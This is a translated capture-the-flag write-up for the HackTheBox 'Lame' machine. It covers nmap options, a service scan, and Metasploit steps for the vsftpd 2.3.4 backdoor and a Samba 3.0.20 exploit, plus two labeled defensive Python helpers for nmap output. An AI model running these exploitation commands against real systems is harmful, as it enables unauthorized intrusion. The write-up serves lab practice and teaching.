HTB-Lame
2022-07-01 03:03:00 【H0ne】
Common nmap options
nmap -iflist: list the local host's network interfaces and routing table
-A: aggressive scan mode (enables OS detection, version detection, script scanning and traceroute)
-T4: set the timing template used during the scan. There are six levels (0-5); the higher the level, the faster the scan, but fast scans are also easier for a firewall or IDS to detect and block. T4 is recommended when network connectivity is good.
-oX test.xml: write the scan results to test.xml in XML format; if the scan is interrupted, the file cannot be opened
-oA test.xml: write the scan results in all output formats at once, using test.xml as the base name; the results are kept even if the scan is interrupted
-oG test.txt: write the scan results to test.txt in grepable format
-sn: host discovery only, no port scan
-O: detect the target's operating system version
-sV: detect the version of each service
-p: scan the specified ports
-sS/sT/sA/sW/sM: use a TCP SYN / Connect() / ACK / Window / Maimon scan against the target host
-sU: use a UDP scan to determine the state of the target's UDP ports
--script: run NSE scripts
nmap -sT 192.168.52.141    scan TCP ports
-sU    scan UDP ports
nmap script scanning
Nmap lets users write their own scripts to automate scanning tasks, or extend the scripts it ships with. The default script directory is /usr/share/nmap/scripts, which holds close to 600 built-in scripts of different categories and functions. Nmap scripts are divided into the following categories:
auth: scripts that handle authentication credentials (bypassing authentication)
broadcast: discover more services on the local network, such as dhcp/dns/sqlserver
brute: brute-force password guessing against common applications such as http/snmp
default: the default script set run by -sC or -A; provides basic script scanning
discovery: gather more information about the network, such as SMB enumeration and SNMP queries
dos: scripts for denial-of-service attacks
exploit: exploit known vulnerabilities to compromise the system
external: use third-party databases or resources, for example whois lookups
fuzzer: fuzzing scripts that send malformed packets to the target to detect potential vulnerabilities
intrusive: intrusive scripts; they may be logged or blocked by the target's IDS/IPS
malware: detect whether the target is infected with malware or has a backdoor open
safe: the opposite of intrusive; these scripts are safe to run
version: scripts that enhance service and version detection
vuln: check whether the target has common vulnerabilities, such as MS08-067
1. Default script scan; mainly gathers information about the application services.
nmap --script=default 192.168.52.141
2. Scan for common vulnerabilities.
nmap --script=vuln 192.168.52.141
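Before running a category such as --script=vuln against a host you are responsible for, it helps to know which scripts that category actually selects and how many of them are also tagged intrusive (and so likely to be logged or blocked by an IDS/IPS, as the list above notes). Nmap records every script's categories in script.db inside the scripts directory. The following parser is an added example written for this page, not code from the post or from the Nmap project; the SAMPLE_SCRIPT_DB text is constructed in the format of that file, and the category tags on the sample entries are illustrative rather than copied from any nmap release. Point it at the real /usr/share/nmap/scripts/script.db to get the live answer.

```python
import re
from collections import defaultdict
from typing import Dict, List, Set

# Constructed sample in the format of /usr/share/nmap/scripts/script.db.
# Category tags here are illustrative, not taken from a specific nmap release.
SAMPLE_SCRIPT_DB = """\
Entry { filename = "ftp-anon.nse", categories = { "default", "auth", "safe", } }
Entry { filename = "ftp-vsftpd-backdoor.nse", categories = { "exploit", "intrusive", "malware", "vuln", } }
Entry { filename = "smb-os-discovery.nse", categories = { "default", "discovery", "safe", } }
Entry { filename = "smb-vuln-ms08-067.nse", categories = { "vuln", "intrusive", } }
Entry { filename = "http-slowloris.nse", categories = { "dos", "intrusive", } }
"""

# One Entry { filename = "...", categories = { "...", "...", } } record per match.
ENTRY = re.compile(
    r'Entry\s*\{\s*filename\s*=\s*"([^"]+)"\s*,\s*categories\s*=\s*\{([^}]*)\}\s*\}'
)


def parse_script_db(text: str) -> Dict[str, Set[str]]:
    """Return {script_name: set_of_categories} parsed from script.db text."""
    scripts: Dict[str, Set[str]] = {}
    for m in ENTRY.finditer(text):
        filename = m.group(1)
        name = filename[:-4] if filename.endswith(".nse") else filename
        categories = set(re.findall(r'"([^"]+)"', m.group(2)))
        scripts[name] = categories
    return scripts


def scripts_in_category(scripts: Dict[str, Set[str]], category: str) -> List[str]:
    """Scripts that `--script=<category>` would select."""
    return sorted(name for name, cats in scripts.items() if category in cats)


def intrusive_scripts(scripts: Dict[str, Set[str]], category: str) -> List[str]:
    """Subset of a category run that is also tagged intrusive (noisy for IDS/IPS)."""
    return sorted(
        name for name, cats in scripts.items()
        if category in cats and "intrusive" in cats
    )


def category_counts(scripts: Dict[str, Set[str]]) -> Dict[str, int]:
    """How many scripts each category contains; a quick view of the script.db."""
    counts: Dict[str, int] = defaultdict(int)
    for cats in scripts.values():
        for cat in cats:
            counts[cat] += 1
    return dict(counts)


def load_script_db(path: str = "/usr/share/nmap/scripts/script.db") -> Dict[str, Set[str]]:
    """Parse the real script.db on a host that has nmap installed."""
    with open(path, encoding="utf-8") as fh:
        return parse_script_db(fh.read())


if __name__ == "__main__":
    db = parse_script_db(SAMPLE_SCRIPT_DB)
    for cat in ("default", "vuln"):
        print(f"--script={cat} selects: {scripts_in_category(db, cat)}")
        print(f"  of which intrusive: {intrusive_scripts(db, cat)}")
    print("category sizes:", category_counts(db))
```

On the sample data a --script=vuln run would select two scripts and both are intrusive, whereas --script=default selects only safe scripts; that is the check worth making before pointing a category at a production host.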
Lame
Step 1: scan the network
nmap -sV -O -F --version-light 10.10.10.3
-sV: probe open ports to determine service/version information
-O: enable operating system detection
-F: fast mode, scans fewer ports than the default
--version-light: limit to the most likely probes (intensity 2)
Four open ports are visible:
PORT     STATE  SERVICE      VERSION
21/tcp   open   ftp          vsftpd 2.3.4                                    (FTP control channel)
22/tcp   open   ssh          OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)    (SSH: secure login, file transfer (scp, sftp) and port forwarding)
139/tcp  open   netbios-ssn  Samba smbd 3.X - 4.X (workgroup: WORKGROUP)     (NetBIOS session service)
445/tcp  open   netbios-ssn  Samba smbd 3.X - 4.X (workgroup: WORKGROUP)     (Microsoft-DS (directory service), SMB file sharing)
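From a defender's side the same four lines are an exposure inventory: which ports are listening, which of them should be, and which run software that public databases already list as vulnerable (vsftpd 2.3.4 and Samba 3.0.20 are the two this post goes on to look up with searchsploit). The script below is an added example written for this page, not code from the post; SAMPLE_NMAP_OUTPUT is constructed from the port table above in nmap's normal-output format, and WATCHLIST is a constructed mapping of version strings to the reasons the post gives. The allowed-port check and the flagging logic are general and work on any nmap normal-output block.

```python
import re
from typing import Dict, List, Set, Tuple

# Constructed sample: nmap's PORT/STATE/SERVICE/VERSION block for the four
# ports shown in this post, in nmap's normal output format.
SAMPLE_NMAP_OUTPUT = """\
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
"""

# Matches lines such as "21/tcp  open  ftp  vsftpd 2.3.4"; the version is optional.
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"(?:\s+(?P<version>.*))?$"
)

# Constructed watchlist: version prefixes this post identifies as having known issues.
WATCHLIST = {
    "vsftpd 2.3.4": "backdoored release archive (see the Metasploit module description)",
    "Samba smbd 3.X - 4.X": "Samba 3.0.20 has public exploits listed by searchsploit",
}


def parse_nmap_ports(text: str) -> List[Dict[str, object]]:
    """Parse the port table of nmap normal output into a list of dicts."""
    ports: List[Dict[str, object]] = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m:
            continue  # header line, blank line, or anything that is not a port row
        ports.append({
            "port": int(m.group("port")),
            "proto": m.group("proto"),
            "state": m.group("state"),
            "service": m.group("service"),
            "version": (m.group("version") or "").strip(),
        })
    return ports


def flag_services(ports: List[Dict[str, object]]) -> List[Tuple[int, str, str, str]]:
    """(port, proto, matched_prefix, reason) for every version on the watchlist."""
    findings = []
    for p in ports:
        for prefix, reason in WATCHLIST.items():
            if str(p["version"]).startswith(prefix):
                findings.append((p["port"], p["proto"], prefix, reason))
    return findings


def unexpected_ports(ports: List[Dict[str, object]],
                     allowed: Set[Tuple[int, str]]) -> List[Tuple[int, str]]:
    """Open ports that are not in the set of (port, proto) pairs that should listen."""
    return sorted(
        (p["port"], p["proto"]) for p in ports
        if p["state"] == "open" and (p["port"], p["proto"]) not in allowed
    )


if __name__ == "__main__":
    inventory = parse_nmap_ports(SAMPLE_NMAP_OUTPUT)
    # Assumption for the demo: only SSH is meant to be reachable on this host.
    for port, proto in unexpected_ports(inventory, {(22, "tcp")}):
        print(f"unexpected listener: {port}/{proto}")
    for port, proto, prefix, reason in flag_services(inventory):
        print(f"{port}/{proto}: {prefix} -> {reason}")
```

The parser deliberately keys on nmap's normal output rather than XML so it can be run over a pasted scan like the one in this post; for automated use, -oX and an XML parser are the more robust choice.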
Step 2: vulnerable FTP
Use searchsploit to check whether vsftpd 2.3.4 has any known vulnerabilities. searchsploit is the command-line search tool for Exploit Database.
searchsploit vsftpd 2.3.4
We will use Metasploit, a penetration testing framework that is an essential tool for attackers and defenders alike.
Start the framework with the msfconsole command
search vsftpd 2.3.4    use this command to find all useful payloads
We use this attack module:
use exploit/unix/ftp/vsftpd_234_backdoor
Load the exploit and view the options it displays
You can see that the remote host (RHOSTS) is not set yet. We will set the remote host and the target, since both are required before the exploit can be run.
Now set the remote host
set RHOSTS 10.10.10.3
Set the target to 0
run    launch the attack
But no session is created: the vulnerability has been fixed, as the module description explains.
This module exploits a malicious backdoor that was added to the VSFTPD download archive. According to the latest information available, the backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30, 2011 and July 1, 2011. The backdoor was removed on July 3, 2011.
Step 3: Samba
We need to find another way; the second step did not work.
nmap -sV -sT -sC 10.10.10.3
searchsploit Samba 3.0.20
Start msfconsole
searchsploit Samba 3.0.20
Load the attack module and show the available options

Set the remote host
set RHOSTS 10.10.10.3
run    start the attack module